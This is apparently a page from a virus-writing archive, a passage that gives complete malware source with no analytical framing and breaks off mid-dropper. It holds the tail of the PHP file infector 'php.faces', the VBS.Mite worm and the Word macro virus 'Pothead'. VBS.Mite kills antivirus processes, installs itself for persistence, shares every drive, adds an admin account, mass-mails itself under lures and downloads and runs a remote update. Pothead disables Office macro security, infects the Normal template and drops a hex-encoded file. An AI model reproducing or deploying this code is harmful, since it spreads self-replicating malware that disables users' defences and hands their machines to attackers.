<count($dhbpgxtamn); $cctsvcopcx++){ $wurwejtvjx = chr(rand(97, 122)); for($ccznwozuuo = 0; $ccznwozuuo <9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122)); $bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty"); } $uudxleoyja = opendir("."); while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){ if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){ if(substr($ionwdbkwfh, -3) == "php"){ $zohqscoxob = fopen($ionwdbkwfh, "r"); $skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5); fclose($zohqscoxob); if(!strstr($skzmabzbfe, "php.faces")){ unlink("$ionwdbkwfh"); $zohqscoxob = fopen($ionwdbkwfh, "a+"); fwrite($zohqscoxob, "$bbugesqpty"); fwrite($zohqscoxob, "$skzmabzbfe"); fclose($zohqscoxob); } } } } closedir($uudxleoyja); // php.faces (c) by Kefi, 2003 ?>

sources

VBS.Mite (ver. 1.0) MYSTiQUE ' VBS.Mite by MYSTiQUE [rRlf] ver. 1.0 on error resume next dim fso, myst, virus, language, Accessories Set myst = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1) virus = fl.ReadAll fl.Close CheckLang() sub CheckLang() If Month(Now()) = 12 And Day(Now()) = 31 Then myst.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SM_AccessoriesName") if Accessories="Ñòàíäàðòíûå" then fso.deletefile wscript.scriptfullname end if end if end sub Task() Sub Task() myst.run"taskkill /f /im drweb32w.exe",0 myst.run"taskkill /f /im drwebupw.exe",0 myst.run"taskkill /f /im drwebwcl.exe",0 myst.run"taskkill /f /im drweb386.exe",0 myst.run"taskkill /f /im SCAN.EXE",0 myst.run"taskkill /f /im NOD32.EXE",0 myst.run"taskkill /f /im NAVWNT.EXE",0 myst.run"taskkill /f /im NAVW32.EXE",0 myst.run"taskkill /f /im ZONEALARM.EXE",0 myst.run"taskkill /f /im TASKMON.EXE",0 myst.run"taskkill /f /im REGEDIT.EXE",0 myst.run"taskkill /f /im REGEDIT32.EXE",0 myst.run"taskkill /f /im OUTPOST.EXE",0 myst.run"taskkill /f /im NPROTECT.EXE",0 myst.run"taskkill /f /im SPIDER.VXD",0 myst.run"taskkill /f /im AVPM.EXE",0 myst.run"taskkill /f /im Norton.EXE",0 myst.run"taskkill /f /im Mcafee.EXE",0 myst.run"taskkill /f /im Sophos.exe",0 myst.run"taskkill /f /im F-PROT.EXE",0 End Sub 'Thanks to [K]Alamar for antideletion function AntiDeletion() Sub AntiDeletion() Set fso = CreateObject("scripting.filesystemobject") Set fuck = fso.opentextfile(wscript.scriptfullname, 1) vir = fuck.readall fuck.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set fuck = fso.createtextfile(wscript.scriptfullname, True) fuck.write vir fuck.Close End If Loop End Sub InstalltoWindows() Sub InstalltoWindows() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(0)+"\DrWeb.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(0)&"\DrWeb.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SPIDERNT",fso.GetSpecialFolder(0)+"\DrWeb.vbs" End sub InstalltoSystem() Sub InstalltoSystem() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1)+"\DrWebUpdate.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(1)&"\DrWebUpdate.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Regedit",fso.GetSpecialFolder(1)+"\DrWebUpdate.vbs" End sub InstalltoSystem2() Sub InstalltoSystem2() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1)+"\Backup.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(1)&"\Backup.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Regedit",fso.GetSpecialFolder(1)+"\Backup.vbs" End Sub InstalltoTemp() Sub InstalltoTemp() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(2)+"\Ctfmon.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(2)&"\Ctfmon.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ctfmon",fso.GetSpecialFolder(2)+"\Ctfmon.vbs" End sub OpenDriVe() Sub OpenDriVe() myst.run"net share f=f:\",0 myst.run"net share c=c:\",0 myst.run"net share d=d:\",0 myst.run"net share e=e:\",0 myst.run"net share g=g:\",0 myst.run"net share h=h:\",0 myst.run"net share i=i:\",0 myst.run"net share j=j:\",0 myst.run"net share k=k:\",0 myst.run"net share l=l:\",0 myst.run"net share m=m:\",0 myst.run"net share n=n:\",0 myst.run"net share o=o:\",0 myst.run"net share p=p:\",0 myst.run"net share q=q:\",0 myst.run"net share r=r:\",0 myst.run"net share s=s:\",0 myst.run"net share t=t:\",0 myst.run"net share u=u:\",0 myst.run"net share v=v:\",0 myst.run"net share w=w:\",0 myst.run"net share x=x:\",0 myst.run"net share y=y:\",0 myst.run"net share z=z:\",0 myst.regwrite"HKEY_CLASSES_ROOT\Network\SharingHandler\","" End sub NoDanger() Sub NoDanger() myst.regwrite"HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown\IExplorer","0","REG_DWORD" End sub NewAdmin() Sub NewAdmin() myst.run"net user Administrator MYSTiQUE /add",0 myst.run"net localgroup administrators /add admin",0 End Sub msT() Sub msT() myst.regwrite "HKCU\software\TheMite\", "VBS.Mite by MYSTiQUE [rRlf]" End Sub NetworkSpreading() Sub NetworkSpreading(FileName) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set Network = CreateObject("WScript.Network") Set Shares = Network.EnumNetworkDrives Set Wormmm = fso.GetFile(WScript.ScriptFullName) Wormmm.Copy(fso.GetSpecialFolder(0)&"\NetWork.txt.vbs") If Shares.Count > 0 Then Set FSO = CreateObject("Scripting.FileSystemObject") For Counter1 = 0 To Shares.Count - 1 If Shares.Item(Counter1) <> "" Then FSO.CopyFile Wormmm, FSO.BuildPath(Shares.Item(Counter1), FileName) Next Set FSO = Nothing End If Set Shares = Nothing Set Network = Nothing End Sub Folder() Sub Folder() On Error Resume Next Set myst = CreateObject("Wscript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") Desktop = myst.SpecialFolders("AllUsersDesktop") StartMenu = myst.SpecialFolders("AllUsersStartMenu") Programs = myst.SpecialFolders("AllUsersPrograms") StartUp = myst.SpecialFolders("AllUsersStartUp") MyDocuments = myst.SpecialFolders("MyDocumets") SendTo = myst.SpecialFolders("SendTo") Recent = myst.SpecialFolders("Recent") Favorites = myst.SpecialFolders("Favorites") Templates = myst.SpecialFolders("Templates") fso.copyfile Wscript.ScriptFullName, SendTo & "\re; answer me.vbs" fso.copyfile Wscript.ScriptFullName, StartMenu & "\win log.vbs" fso.copyfile Wscript.ScriptFullName, Recent & "\fss vs. cia.vbs" fso.copyfile Wscript.ScriptFullName, Favorites & "\AdminPages whitehouse.lnk. vbs" fso.copyfile Wscript.ScriptFullName, Dektop & "\open Me.vbs" fso.copyfile wscript.scriptfullname, Templates & "\Word.vbs" fso.copyfile Wscript.Scriptfullname, Mydocuments & "\ReadMe.txt.vbs" fso.copyfile wscript.scriptfullname, Startup & "\kernel32.dll.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(0)&"\kernel32.dll.vbs") f.attributes = f.attributes + 2 fso.copyfile wscript.scriptfullname, Programs & "\drweb.vbs" end sub payload() sub payload() if day(now())=20 then myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr","1","REG_DWORD" myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools","1","REG_DWORD" myst.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Fucking Toilet" myst.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR\Start","4","REG_DWORD" myst.regwrite"HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown\IExplorer","0","REG_DWORD" end if end sub infectfile() Sub infectfile() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set drv = fso.Drives For Each d In drv If d.DriveType = 2 Or d.DriveType = 3 Then list(d.path&"\") End If Next End Sub Sub list(doss) On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set fold = fso.GetFolder(doss) Set yebjp = fold.SubFolders For Each f1 In yebjp infect(f1.Path) list(f1.Path) Next End Sub Sub infect(doss) On Error Resume Next Set mst = CreateObject("Scripting.FileSystemObject") Set lxxj = mst.GetFolder(doss) Set fc = lxxj.Files For Each f1 In fc ext = fso.GetExtensionName(f1.Path) ext = lCase(ext) If (ext = "vbs") or (ext = "vbe") or (ext = "vdb") Then Set cot = fso.OpenTextFile(f1.Path, 1, False) If cot.ReadLine <> "'ohuenno pizdatiy virus" Then cot.Close Set cot = fso.OpenTextFile(f1.Path, 1, False) vbsorg = cot.ReadAll() cot.Close Set inf = fso.OpenTextFile(f1.Path, 2, True) inf.WriteLine virus inf.WriteLine "" inf.WriteLine (vbsorg) inf.Close End if End If Next End Sub update() Sub update() Dim Inet, myst Dim DoWnLoAd Set Inet = CreateObject("InetCtls.Inet") Inet.RequestTimeOut = 30 DoWnLoAd = Inet.OpenURL("http://vx.netlux.org/rrlf/mite update.txt") set fso = createobject("scripting.filesystemobject") set f = fso.CreateTextFile("c:\update.vbs") f.write DoWnLoAd f.close Set myst = CreateObject("WScript.Shell") myst.run ("c:\update.vbs") end sub dos() sub dos() If Month(Now()) = 5 And Day(Now()) = 9 Then myst.run (fso.GetSpecialFolder(1)+"\ping.exe -t -l 10000 www.whitehouse.gov"),0 End if end sub CheckLang() Email() Sub Email() Set O=CreateObject("Outlook.Application") Set mapi=O.GetNameSpace("MAPI") For Each AL In mapi.AddressLists If AL.AddressEntries.Count <> 0 Then For AddListCount = 1 To AL.AddressEntries.Count Set ALE = AL.AddressEntries(AddListCount) Set go = O.CreateItem(0) go.To = ALE.Address Randomize num=Int((3*Rnd)+1) Set c = f.GetFile(WScript.ScriptFullName) If num = 1 then c.Copy(fso.GetSpecialFolder(0)&"\Free porn.txt.vbs") go.Subject = "New free porn !" go.Body = "Look at this " go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Free porn.txt.vbs") elseif num = 2 then c.Copy(fso.GetSpecialFolder(0)&"\Free Key (DrWeb and KAV).vbs") go.Subject = "Free Key" go.Body = "Free Key (DrWeb and KAV)" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Free Key (DrWeb and KAV).vbs") elseif num = 3 then c.Copy(fso.GetSpecialFolder(0)&"\viruslist.txt.vbs") go.Subject = "News from www.viruslist.com" go.Body = "Read this news" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"viruslist.txt.vbs") End If If go.To <> "" Then go.Send End If Next End If Next End Sub

sources

Pothead Necronomikon Private Sub Document_Open() On Error Resume Next 'Pothead '(c) by Necronomikon/ZeroGravity '---------------------------------------------------------- ' thanks jackie for some advanced code Word.Application.Options.VirusProtection = n Word.Application.Options.ConfirmConversions = n Word.Application.Options.SaveNormalPrompt = n Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& CommandBars("Macro").Controls("Security...").Enabled = False Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& CommandBars("Macro").Controls("Security...").Enabled = False End Select WordBasic.DisableAutoMacros 0 Application.DisplayStatusBar = False ActiveDocument.ReadOnlyRecommended = False End Sub Private Sub Document_Close() On Error Resume Next On Error Resume Next: Randomize Dim nec1 As Object, nec2 As Object, nec3 As Object, nec4 As Object, nec5 As Object Dim thc As Object, lsd As Object, dope As Object, weed As Object, coke As Object Set nec1 = ActiveDocument: Set nec2 = nec1.VBProject: Set nec3 = nec2.VBComponents: Set nec4 = nec3.Item(1): Set nec5 = nec4.CodeModule Set thc = NormalTemplate: Set lsd = thc.VBProject: Set dope = lsd.VBComponents: Set weed = dope.Item(1): Set coke = weed.CodeModule pshq = coke.countoflines: zero = nec5.countoflines: gravity = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65) If pshq < zero Then For sysnec = 1 To pshq: NT5.replaceline sysnec, gravity: Next sysnec For sysnec = 1 To zero: peace = nec5.lines(sysnec, 1): coke.insertlines sysnec, peace: Next sysnec NormalTemplate.Save: End If If zero < pshq Then For sysnec = 1 To zero: nec5.replaceline sysnec, gravity: Next sysnec For sysnec = 1 To pshq: peace = coke.lines(sysnec, 1): nec5.insertlines sysnec, peace: Next sysnec ActiveDocument.Save: End If End Sub Sub FileSaveAs() On Error Resume Next Open Environ("WINDIR") & "\pothead.tmp" For Output As #1 Print #1, "n " & Environ("WINDIR") & "\POTHEAD.JPG" Print #1, "e 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01" Print #1, "e 0110 00 01 00 00 FF DB 00 43 00 06 04 05 06 05 04 06" Print #1, "e 0120 06 05 06 07 07 06 08 0A 10 0A 0A 09 09 0A 14 0E" Print #1, "e 0130 0F 0C 10 17 14 18 18 17 14 16 16 1A 1D 25 1F 1A" Print #1, "e 0140 1B 23 1C 16 16 20 2C 20 23 26 27 29 2A 29 19 1F" Print #1, "e 0150 2D 30 2D 28 30 25 28 29 28 FF DB 00 43 01 07 07" Print #1, "e 0160 07 0A 08 0A 13 0A 0A 13 28 1A 16 1A 28 28 28 28" Print #1, "e 0170 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28" Print #1, "e 0180 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28" Print #1, "e 0190 28 28 28 28 28 28 28 28 28 28 28 28 28 28 FF C2" Print #1, "e 01A0 00 11 08 00 BD 02 37 03 01 22 00 02 11 01 03 11" Print #1, "e 01B0 01 FF C4 00 1B 00 00 01 05 01 01 00 00 00 00 00" Print #1, "e 01C0 00 00 00 00 00 00 05 01 02 03 04 06 00 07 FF C4" Print #1, "e 01D0 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00" Print #1, "e 01E0 00 00 00 00 01 02 03 04 05 FF DA 00 0C 03 01 00" Print #1, "e 01F0 02 10 03 10 00 00 01 2F 14 10 73 55 D1 D7 03 0E" Print #1, "e 0200 F8 18 E9 53 96 47 2B A5 14 F3 02 0C ED 05 54 09" Print #1, "e 0210 36 26 AD 4F A1 CD 95 39 0E CA 55 B0 9F 23 78 68" Print #1, "e 0220 07 55 95 1D 8B D9 87 39 D0 A6 79 5C E8 9B 9D E1" Print #1, "e 0230 1D 68 26 0C F2 E7 91 AD 0B B3 BC 07 98 09 8C 3D" Print #1, "e 0240 10 56 81 89 00 A2 34 F5 46 56 03 8A 0D 40 F3 81" Print #1, "e 0250 BC 0E 3C 0A 81 A7 04 7A 66 D0 3A 81 87 86 40 37" Print #1, "e 0260 38 0B 20 42 C8 5A ED 69 22 CA 35 AD 4F 65 A5 0D" Print #1, "e 0270 2D 8C 7C 21 B7 6E 76 EC D1 49 29 5C 40 85 AD 61" Print #1, "e 0280 95 FA 3E A0 1A A4 FA E7 65 91 43 9E 8E E6 4E 0F" Print #1, "e 0290 BC 35 EA 8B 70 DB 49 E8 68 02 95 33 D5 9B 24 B7" Print #1, "e 02A0 8A 3F 94 6A FC 63 99 79 EF CB F9 8E A6 59 DC B9" Print #1, "e 02B0 80 CA F3 4C 7B 36 C5 39 79 CA 73 95 0C 5B 37 95" Print #1, "e 02C0 08 53 D6 A6 F3 6B AB 7A 78 D6 6B C7 39 03 C4 2B" Print #1, "e 02D0 54 D7 E9 79 A7 D7 B9 58 19 CF 70 44 B3 28 40 93" Print #1, "e 02E0 B4 22 59 38 51 A4 8D 04 E5 70 4B 1F 34 72 46 D9" Print #1, "e 02F0 44 BD 25 E5 43 64 B3 18 25 53 A3 C2 27 C1 05 2B" Print #1, "e 0300 66 03 D4 41 82 79 6D 94 50 3E 8F 86 3A CE 96 89" Print #1, "e 0310 59 FE 27 68 06 5B F5 EA B9 D7 8D B7 6F 55 D6 7C" Print #1, "e 0320 9D 49 96 8D D1 0F 9E 2E 02 90 F2 5A 8C 79 01 84" Print #1, "e 0330 63 26 8D DD 5C 97 35 D9 B2 71 A9 60 52 0A 9B 7D" Print #1, "e 0340 BA F7 9C 45 0D DA 29 23 DB 2B 65 B4 41 08 E5 A9" Print #1, "e 0350 49 59 69 E5 14 B2 D9 B8 11 47 40 29 58 30 1A A1" Print #1, "e 0360 71 B6 4E 99 90 BB E1 6A 9D 8A CE 56 46 28 4E B1" Print #1, "e 0370 F2 73 3A 29 13 7C D0 4A 8E 6A F0 46 24 BD 2A 9A" Print #1, "e 0380 AE 69 F6 A9 98 34 47 9F A8 59 72 11 C3 B7 79 6D" Print #1, "e 0390 D6 35 C1 E9 63 A5 E6 78 EF 79 C8 B7 E5 CC BD 47" Print #1, "e 03A0 7C 66 D8 63 F5 52 C0 F2 73 7A 72 B5 82 67 7A C3" Print #1, "e 03B0 10 4B 96 A7 1C 2C 7A 92 38 D2 70 55 E7 AE 1F 2B" Print #1, "e 03C0 48 46 57 D4 00 AA F3 7B 9A 46 0F 3B 43 58 3E F3" Print #1, "e 03D0 C9 C9 EA 7A 1D F9 7C 75 DE A8 D1 F8 DC 3E A9 55" Print #1, "e 03E0 9E 6F 6F 5B 95 91 50 63 D0 4A CB 24 CF 7B 17 81" Print #1, "e 03F0 BD 3D 0D CC A4 C9 EA FB 2B 38 19 60 E8 9C DA 88" Print #1, "e 0400 6B A6 DA 20 94 9A 66 3A B4 D5 EB 39 B9 8A 0E 73" Print #1, "e 0410 14 73 49 13 D3 7B A3 54 3D D0 34 2C 31 8D 0A 1A" Print #1, "e 0420 38 AE 4D 91 50 54 A6 F7 8E C0 E8 51 A0 84 F6 01" Print #1, "e 0430 A3 C9 8D 9A A7 6B 7B 3F A7 4B 39 E7 BE B3 80 1B" Print #1, "e 0440 4B D7 34 69 8D E4 ED 79 BD F0 61 26 5C 55 CE 18" Print #1, "e 0450 15 CB D3 43 38 73 3E B5 1D A7 14 CB 9D 06 72 CB" Print #1, "e 0460 93 A3 7C 74 2C 32 6B 31 04 BD 1F A4 79 F5 BE AE" Print #1, "e 0470 1D 6C E2 BB 4C A6 A7 73 3D 2D F9 C7 E6 0A F5 47" Print #1, "e 0480 60 67 77 73 21 EA 30 4C E5 68 9E CA E1 D5 35 12" Print #1, "e 0490 4C 0A 17 0D FA 3A 5E 35 43 D9 7C E1 50 47 5B 7D" Print #1, "e 04A0 C0 E2 37 E1 9B AF 0E A9 8E 30 ED 25 43 5C 11 79" Print #1, "e 04B0 46 E7 C4 AA A5 74 2F 4E 67 41 2A 71 AB 5C 0E AB" Print #1, "e 04C0 35 37 3A D2 98 FD 26 5D 06 18 2E FE 77 C5 A9 64" Print #1, "e 04D0 C7 EC 71 F8 BB 75 E7 F4 53 60 6E 45 9C A0 0C 12" Print #1, "e 04E0 24 06 91 59 B5 66 55 8E 47 F3 7B 5C BD A9 A0 2F" Print #1, "e 04F0 69 AE 28 94 99 CC 02 24 F2 BD 9E BE 9D 9D 02 B3" Print #1, "e 0500 4C 5E B6 C8 C5 22 6B CF 02 4A 63 5C 1A 44 1D B7" Print #1, "e 0510 1B 24 C6 15 A9 D0 65 A5 B8 40 8B 53 09 19 9B 9E" Print #1, "e 0520 73 60 AD D4 D9 05 27 41 85 32 33 3D A7 3B 92 93" Print #1, "e 0530 3E 92 49 4D 00 81 6C BD A9 65 44 32 B3 3B 49 9E" Print #1, "e 0540 D5 6F C6 52 C6 6E DD 73 E9 6B D7 80 99 EB C3 7C" Print #1, "e 0550 AA 34 8E 92 4F CC AA 7A D7 99 CE D4 5D 4D 27 5B" Print #1, "e 0560 4E A7 C1 34 49 CD 73 9B C2 D2 DF C6 99 CB 79 18" Print #1, "e 0570 E9 56 89 62 04 55 76 B6 A0 21 27 B3 76 33 C4 CF" Print #1, "e 0580 14 B5 AD 4A EA 0E D7 1E E7 F3 67 EB 5F CD 25 EA" Print #1, "e 0590 21 C1 16 B8 C8 BA 61 F9 6D 6D D4 22 9B BD 5A 39" Print #1, "e 05A0 6B 38 A6 3B 67 5C 8C 12 F3 23 2E 08 55 15 65 1C" Print #1, "e 05B0 92 D5 27 4B 5C 4E 88 80 F9 6D 10 B9 DA 9D D4 A0" Print #1, "e 05C0 51 26 8F E0 23 51 8C 04 73 3A 5D E8 AB F2 D2 CC" Print #1, "e 05D0 0D 47 2A 9D CE 49 E9 F2 3A 6D F2 AB 20 77 2A D3" Print #1, "e 05E0 CF 98 D0 A9 95 61 89 66 42 51 4F 24 ED 6C 78 F5" Print #1, "e 05F0 74 9B C9 1D 0A 9D C1 DD DC 1D CA A8 6D DA 4A 33" Print #1, "e 0600 D5 5D D8 F4 CF 20 D7 D2 21 5B 95 38 24 6C 63 BE" Print #1, "e 0610 7F 2F 6A 58 1E 8D FD 1C 7D CF E6 5F BE 16 64 F4" Print #1, "e 0620 99 1D 62 13 98 47 46 AF A4 82 D8 56 BC BA 1A 55" Print #1, "e 0630 A1 58 D3 96 91 DC 4D 66 4A ED 38 9C DF 92 9F 0A" Print #1, "e 0640 9E B7 38 35 53 E1 EE 54 A8 8A 1C A9 C3 E9 EB F3" Print #1, "e 0650 52 C5 6A D5 02 FA 68 60 EE E4 4D 4C 52 DA EF 01" Print #1, "e 0660 A1 70 6D 0A E5 C3 49 CE E6 64 2F 1D CB A1 ED 93" Print #1, "e 0670 7C 62 D3 44 D0 4B 12 AE EE E4 FB 95 01 3B B8 08" Print #1, "e 0680 13 CE 2A 3B B9 18 F9 60 9A 6D FD 0F 15 65 D4 DE" Print #1, "e 0690 9C C9 02 84 91 17 12 28 D5 AE BC 93 A7 E6 18 04" Print #1, "e 06A0 6C 18 AC CF 25 E5 43 AC DE 3A 2C 4D CA 5A 04 EB" Print #1, "e 06B0 68 9D B5 BC C4 67 F4 9E 61 2D E2 EC 1E A8 CF 5A" Print #1, "e 06C0 2C 8D 54 AE 45 C2 CF 50 D3 E6 27 4E EE E5 4F 7C" Print #1, "e 06D0 13 B7 1F 58 AC 9F 72 4A 28 5E CE 6A FA 52 93 41" Print #1, "e 06E0 84 0C BA A4 7D 90 90 37 35 6B 35 73 7C BC 99 9C" Print #1, "e 06F0 E6 CC 05 A9 1A 15 79 8E 45 7C E8 C6 13 18 1C A8" Print #1, "e 0700 A9 F2 2F 02 77 70 77 77 07 77 70 74 D0 AA 76 61" Print #1, "e 0710 E9 55 C3 61 88 0D 49 78 23 8D CC 71 CF 6A 35 DD" Print #1, "e 0720 DC 16 AC D5 DE 62 C6 5D 3F 27 36 78 A2 04 B2 FB" Print #1, "e 0730 B1 88 C6 6C ED CB 57 D3 33 59 41 E5 CD E5 20 56" Print #1, "e 0740 4B FD 79 31 CE EA 9A 12 73 9B 0D 97 DB E5 E3 61" Print #1, "e 0750 CA E9 8B 69 77 EE 39 57 97 24 2B D5 6D 72 5B 15" Print #1, "e 0760 27 B7 81 15 C8 09 DD 7D AA A4 CA D6 E9 95 0B 64" Print #1, "e 0770 6C 36 A2 A6 0F 97 B8 09 37 B5 D5 9E 56 E9 31 02" Print #1, "e 0780 17 5E EC 0B 48 15 24 54 F5 49 19 55 B2 C6 84 E5" Print #1, "e 0790 E0 E4 5E 12 2F 70 D7 91 51 31 BC F2 CD 7A 4D EF" Print #1, "e 07A0 2A 4C DD BA 0E 4D A5 39 51 AE EE E1 59 DF 79 EF" Print #1, "e 07B0 A1 73 55 95 78 FE 4C EF B7 23 BE A7 12 E5 B6 CA" Print #1, "e 07C0 01 1C CE 95 82 81 5C C1 DA 76 04 CB 30 16 1F 7C" Print #1, "e 07D0 39 2E 91 F4 E9 DB 9E B5 DC CC 5E D4 43 6D CA FC" Print #1, "e 07E0 76 D5 9E 50 8A 9E 8D F2 A7 33 95 74 34 07 B7 4A" Print #1, "e 07F0 BB 35 11 67 3A A6 F5 46 24 57 77 74 9D DD C8 EE" Print #1, "e 0800 EE 0D 4E 8B 0B A7 02 71 1E B5 8E 9E 64 1F D2 FC" Print #1, "e 0810 C7 41 92 B2 3D 22 DC E3 9E 16 23 90 90 0C ED 1C" Print #1, "e 0820 6D 67 6B EA C2 26 3F 8B 13 CE B2 CB BE 37 37 E6" Print #1, "e 0830 49 EB 70 CB F2 14 F4 A1 CD E1 13 69 13 9C 87 69" Print #1, "e 0840 AA B4 0F 8B 73 5B 72 C6 86 F2 5E 54 C4 D7 C4 91" Print #1, "e 0850 58 73 63 64 65 9C B2 F3 CF 42 0F 9F D4 D0 BB 2A" Print #1, "e 0860 56 55 EB 31 4A 68 92 3A 25 33 0E 41 D6 8E 96 C1" Print #1, "e 0870 D5 20 9E 97 00 94 7A 14 18 48 A4 10 96 23 ED A8" Print #1, "e 0880 D5 5E 26 C9 35 6A 0E B0 37 69 37 86 DF BC 98 1E" Print #1, "e 0890 BD 4B 26 9C BC 84 E5 E0 4E 97 63 37 96 DD DB B3" Print #1, "e 08A0 8F 4A CA B4 E2 F2 D9 3D 9E 4B 7E 74 D0 E7 D7 5C" Print #1, "e 08B0 B4 85 B0 B2 0B D5 A3 F3 DD 0D 2D 04 A0 C4 8B 58" Print #1, "e 08C0 18 77 A4 45 E3 FB 7A 2B 9B A3 33 D7 C7 CE AD A0" Print #1, "e 08D0 FA B4 9E D1 2B A6 65 5A B0 32 76 07 48 A3 5C 1F" Print #1, "e 08E0 93 FF C4 00 2C 10 00 02 02 01 03 03 03 03 05 01" Print #1, "e 08F0 01 01 00 00 00 00 02 03 00 01 04 05 11 12 10 13" Print #1, "e 0900 14 20 21 22 23 30 31 06 15 32 33 41 24 34 43 FF" Print #1, "e 0910 DA 00 08 01 01 00 01 05 02 21 96 33 84 69 F1 73" Print #1, "e 0920 03 78 5B B1 B6 8B BB 5A 16 31 B7 CE 10 5E E3 C8" Print #1, "e 0930 61 34 E5 64 32 A6 2E 55 32 0E 2E F0 71 AC 61 62" Print #1, "e 0940 EF 77 8D BD 78 DE D7 8D 3B 3C 2F 50 FE 58 57 B2" Print #1, "e 0950 EC A7 29 CE 6F 37 9B CE 7D 37 EB 7D 4A E6 F2 8A" Print #1, "e 0960 6F F0 DE 6F 39 4A BE 95 D2 E0 FA 2A 6F EF FE 7F" Print #1, "e 0970 B5 37 A9 77 05 EB 96 55 77 DC 1A B0 68 94 BB 97" Print #1, "e 0980 D2 A6 69 7C 70 3F A5 BF CA F3 53 3C D4 DD D6 52" Print #1, "e 0990 A6 71 5B 89 8E 64 5B B8 CE E7 28 4D 11 1B B6 9D" Print #1, "e 09A0 27 19 24 80 C5 A2 BC BC 5A 54 2C 46 D4 25 90 4C" Print #1, "e 09B0 4D 40 C2 16 A1 3C FD E0 3C CA AD CD 82 D6 C2 9A" Print #1, "e 09C0 8F F2 5E 4F 6E AF 32 E7 99 3C C9 E6 5C F3 27 97" Print #1, "e 09D0 3C AB 9E 49 CF 24 E7 92 53 C9 39 E4 9C EF 9C EF" Print #1, "e 09E0 9C B6 94 EE 14 EE 14 EE 97 6F B8 53 BA 53 BC 52" Print #1, "e 09F0 B2 0A 79 25 3C A2 9E 51 4F 2A E5 65 CF 2E 79 73" Print #1, "e 0A00 CC A9 E5 CA CA 19 E4 FC 7C AA 87 96 40 7E 49 F2" Print #1, "e 0A10 6B 08 AD 6F 65 43 BB 65 16 C2 1D C3 BA 46 41 0D" Print #1, "e 0A20 D6 58 59 79 01 B8 FE 33 BF 18 3F D0 CB F9 74 58" Print #1, "e 0A30 9E CD BF 79 BC 5D 59 DD A8 2A 0A B7 1D A8 69 79" Print #1, "e 0A40 05 E3 8E 60 AC 6B 52 BD 95 7E 63 32 F0 C5 6A 5F" Print #1, "e 0A50 76 E1 24 8A C5 B9 18 E5 83 9B DF AD FD AF DE 6A" Print #1, "e 0A60 7F CC FF 00 3F 67 81 4E D9 CD B6 F5 5F F5 FD DB" Print #1, "e 0A70 2A DA 88 B7 BB 19 7E D3 DC 84 68 6C B8 DD 95 91" Print #1, "e 0A80 09 82 48 C7 FD 03 20 23 71 6F CA FB AB CC 11 66" Print #1, "e 0A90 63 04 EB 1A B6 C6 3F CC 0F 68 4D 22 BD B7 BD A7" Print #1, "e 0AA0 C6 83 DE 72 E3 39 7B F7 D9 B7 CE A2 90 4D 30 40" Print #1, "e 0AB0 A7 27 71 EF 92 F2 AC 1B CA 8F 94 E5 71 47 60 62" Print #1, "e 0AC0 D7 D8 E3 91 DD EA 7F CC FF 00 3D 76 B9 C6 E0 A4" Print #1, "e 0AD0 CA 06 26 F2 B1 76 82 8B 94 99 D9 87 8F BC 3C 6A" Print #1, "e 0AE0 85 8F 72 D7 75 38 CE 30 83 E3 C6 6D 38 CE 13 B7" Print #1, "e 0AF0 3B 77 38 5C E1 73 81 4E 37 36 B9 B4 BA AA 97 75" Print #1, "e 0B00 3D BA 0D D4 FE 65 E2 95 2E F1 D9 B0 A4 CC BC 47" Print #1, "e 0B10 9C 60 30 2E 8C 87 A7 E1 77 F9 1F CD 0F 1C 73 FC" Print #1, "e 0B20 D4 2B 9F 8E 98 E9 